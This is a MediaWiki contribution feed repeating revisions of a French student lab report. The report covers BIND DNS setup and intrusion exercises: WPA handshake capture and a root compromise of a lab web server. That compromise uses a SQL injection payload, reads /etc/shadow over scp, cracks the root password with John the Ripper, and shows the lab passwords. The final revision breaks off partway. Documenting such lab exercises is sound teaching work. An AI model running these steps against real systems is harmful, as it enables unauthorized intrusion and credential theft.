<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Aglaine</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Aglaine"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Aglaine"/>
		<updated>2026-04-25T10:49:09Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54169</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54169"/>
				<updated>2020-11-30T17:00:50Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* 4.1. Configuration des DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
=4. Services Internet=&lt;br /&gt;
==4.1. Configuration des DNS==&lt;br /&gt;
&lt;br /&gt;
'''Configuration commencée le 16/11, terminée le 30/11'''&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps il a fallu réserver un nom de domaine dans la section '''Glue Records''' sur gandi.net :&lt;br /&gt;
 ns1.truffe.site&lt;br /&gt;
&lt;br /&gt;
'''Configuration de bind'''&lt;br /&gt;
&lt;br /&gt;
Installation du paquet nécessaire :&lt;br /&gt;
 sudo apt-get install bind9&lt;br /&gt;
&lt;br /&gt;
Changement dans le fichier /etc/resolv.conf pour avoir une connexion :&lt;br /&gt;
 nameserver 8.8.8.8&lt;br /&gt;
&lt;br /&gt;
Configuration des options de transfert d'information :&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.options, on modifie comme ci-dessous.&lt;br /&gt;
 options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
        };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; { 217.70.177.40/32; };&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS dans la zone ''truffe.site'' :&lt;br /&gt;
&lt;br /&gt;
On travaille maintenant dans le fichier /etc/bind/named.conf.local.&lt;br /&gt;
&lt;br /&gt;
On souhaite créer une zone truffe.site de type master.&lt;br /&gt;
&lt;br /&gt;
On ajoute aussi le chemin vers son fichier de configuration (fichier à créer a posteriori).&lt;br /&gt;
&lt;br /&gt;
Finalement, on autorise le transfert d'informations vers le DNS primaire associé à l'adresse suivante  : 217.70.177.40&lt;br /&gt;
 zone &amp;quot;truffe.site&amp;quot; IN {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.truffe.site&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Configuration de la zone ''truffe.site'' :&lt;br /&gt;
&lt;br /&gt;
En s'inspirant du fichier /etc/bind/db.local déjà présent, on crée un fichier /etc/bind/db.truffe.site.&lt;br /&gt;
&lt;br /&gt;
On y ajoute les serveurs DNS principau et secondaires ''ns1.truffe.site'' et ''ns6.gandi.net'' ainsi que l'adresse ip de notre VM sous ns1.&lt;br /&gt;
&lt;br /&gt;
Il faut également modifier localhost et root.localhost et incrémenter le Serial.&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.truffe.site. postmaster.truffe.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.truffe.site&lt;br /&gt;
 @       IN      NS      ns6.gandi.net&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
=5. Tests d'intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.2 Cassage de clef WEP d'un point d'accès WiFi==&lt;br /&gt;
&lt;br /&gt;
==5.3 Cassage de mot de passe WPA-PSK par force brute==&lt;br /&gt;
&lt;br /&gt;
On utilise encore une fois ''aircrack-ng''.&lt;br /&gt;
&lt;br /&gt;
On commence donc par les commandes suivantes:&lt;br /&gt;
&lt;br /&gt;
  airmon-ng&lt;br /&gt;
&lt;br /&gt;
  airmon-ng start wlx40a5ef05a110&lt;br /&gt;
&lt;br /&gt;
L'interface réseau a été renommé suite à cela en ''wlan0mon''.&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère ainsi le BSSID et le canal de krakotte12. &lt;br /&gt;
On cherche alors à récupérer le ''handshake'' via la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  airodump-ng  --bssid 00:14:1B:60:8C:2B wlan0mon --channel 5 --write hand&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54153</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54153"/>
				<updated>2020-11-30T16:47:06Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* 4.1. Configuration des DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
=4. Services Internet=&lt;br /&gt;
==4.1. Configuration des DNS==&lt;br /&gt;
&lt;br /&gt;
'''Configuration effectuée le 16/11'''&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps il a fallu réserver un nom de domaine dans la section '''Glue Records''' sur gandi.net :&lt;br /&gt;
 ns1.truffe.site&lt;br /&gt;
&lt;br /&gt;
'''Configuration de bind'''&lt;br /&gt;
&lt;br /&gt;
Installation du paquet nécessaire :&lt;br /&gt;
 sudo apt-get install bind9&lt;br /&gt;
&lt;br /&gt;
Changement dans le fichier /etc/resolv.conf pour avoir une connexion :&lt;br /&gt;
 nameserver 8.8.8.8&lt;br /&gt;
&lt;br /&gt;
Configuration des options de transfert d'information :&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/bind/named.conf.options, on modifie comme ci-dessous.&lt;br /&gt;
 options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
        };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; { 217.70.177.40/32; };&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS dans la zone ''truffe.site'' :&lt;br /&gt;
&lt;br /&gt;
On travaille maintenant dans le fichier /etc/bind/named.conf.local.&lt;br /&gt;
On souhaite créer une zone truffe.site de type master.&lt;br /&gt;
On ajoute aussi le chemin vers son fichier de configuration (fichier à créer a posteriori).&lt;br /&gt;
Finalement, on autorise le transfert d'informations vers le DNS primaire associé à l'adresse suivante  : 217.70.177.40&lt;br /&gt;
 zone &amp;quot;truffe.site&amp;quot; IN {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.truffe.site&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
=5. Tests d'intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.2 Cassage de clef WEP d'un point d'accès WiFi==&lt;br /&gt;
&lt;br /&gt;
==5.3 Cassage de mot de passe WPA-PSK par force brute==&lt;br /&gt;
&lt;br /&gt;
On utilise encore une fois ''aircrack-ng''.&lt;br /&gt;
&lt;br /&gt;
On commence donc par les commandes suivantes:&lt;br /&gt;
&lt;br /&gt;
  airmon-ng&lt;br /&gt;
&lt;br /&gt;
  airmon-ng start wlx40a5ef05a110&lt;br /&gt;
&lt;br /&gt;
L'interface réseau a été renommé suite à cela en ''wlan0mon''.&lt;br /&gt;
&lt;br /&gt;
On peut donc lancer la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère ainsi le BSSID et le canal de krakotte12. &lt;br /&gt;
On cherche alors à récupérer le ''handshake'' via la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  airodump-ng  --bssid 00:14:1B:60:8C:2B wlan0mon --channel 5 --write hand&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54125</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54125"/>
				<updated>2020-11-30T16:21:33Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* 4. Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
=4. Services Internet=&lt;br /&gt;
==4.1. Configuration des DNS==&lt;br /&gt;
&lt;br /&gt;
=5. Tests d'intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54124</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54124"/>
				<updated>2020-11-30T16:20:26Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
=4. Services Internet=&lt;br /&gt;
&lt;br /&gt;
=5. Tests d'intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54120</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54120"/>
				<updated>2020-11-30T16:08:07Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
=4. Services Internet=&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
  sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
&lt;br /&gt;
Maintenant que nous avons un dictionnaire adéquat, nous pouvons nous consacrer au craquage du mot de passe pleinement. Nous allons regrouper ''passwd_rex'' et ''shadow_rex'' avec la commande suivante:&lt;br /&gt;
&lt;br /&gt;
  unshadow /home/passwd_rex /home/shadow_rex | head &amp;gt; password&lt;br /&gt;
&lt;br /&gt;
Puis utiliser la force brute avec la commande:&lt;br /&gt;
&lt;br /&gt;
  john -w:dico password&lt;br /&gt;
&lt;br /&gt;
On obtient alors le mot de passe ''root'' suivant: ''fortfort''&lt;br /&gt;
&lt;br /&gt;
On peut alors se connecter en SSH:&lt;br /&gt;
&lt;br /&gt;
  ssh root@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Puis ajouter un fichier:&lt;br /&gt;
&lt;br /&gt;
  touch Normand_Claudel_grp12&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54119</id>
		<title>TP sysres IMA5sc 2020/2021 G12</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G12&amp;diff=54119"/>
				<updated>2020-11-30T16:07:37Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* 5.5  Intrusion sur un serveur d’application Web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA Quentin Normand / Maxime Claudel - truffe&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web==&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est de se connecter en ssh en tant que root sur le serveur honey.plil.info.&lt;br /&gt;
&lt;br /&gt;
Pour cela, dans un navigateur web, on examine l'application, et on tente une injection SQL dans le champ identifiant via la commande:&lt;br /&gt;
&lt;br /&gt;
  'OR 1=1#&lt;br /&gt;
&lt;br /&gt;
On obtient ainsi une liste d'utilisateurs avec les mots de passe associés.&lt;br /&gt;
&lt;br /&gt;
On peut donc désormais se connecter à l'application avec l'identifiant ''admin'' et son mot de passe ''jesuislechef''.&lt;br /&gt;
&lt;br /&gt;
Par la suite, on a pu voir les différents manuels, et en ajouter un avec le chemin /etc/phpmyadmin/config-db. En téléchargeant le fichier nouvellement créé, on a pu récupérer le mot de passe ''gencovid19''.&lt;br /&gt;
En se connectant en ''root'' avec ce mot de passe à phpmyadmin on a pu rentrer dans la table ''users'' et récupérer le login ''rex'' et le mot de passe associé ''plainpassword''.&lt;br /&gt;
&lt;br /&gt;
On a donc pu se connecter en SSH au serveur:&lt;br /&gt;
&lt;br /&gt;
  ssh rex@honey.plil.info&lt;br /&gt;
&lt;br /&gt;
On a ensuite utilisé les commandes suivantes pour récupérer les fichiers /etc/passwd et /etx/shadow:&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/shadow shadow_rex&lt;br /&gt;
&lt;br /&gt;
  scp rex@honey.plil.info:/etc/passwd passwd_rex&lt;br /&gt;
&lt;br /&gt;
Ces deux fichiers vont nous permettre de récupérer le mot de passe ''root'' par force brute via l'utilitaire ''johnthereaper''.&lt;br /&gt;
&lt;br /&gt;
Cependant, grâce aux indications données, nous pouvons limité la force brute aux mots de passe formé de 2chaines identiques de 4 caractères. On va donc dans un premier temps créer un dictionnaire de mots de 4 caractères:&lt;br /&gt;
&lt;br /&gt;
  crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
&lt;br /&gt;
Puis le transformé en dictionnaire de mots de 8 caractères en doublant les mots présents:&lt;br /&gt;
&lt;br /&gt;
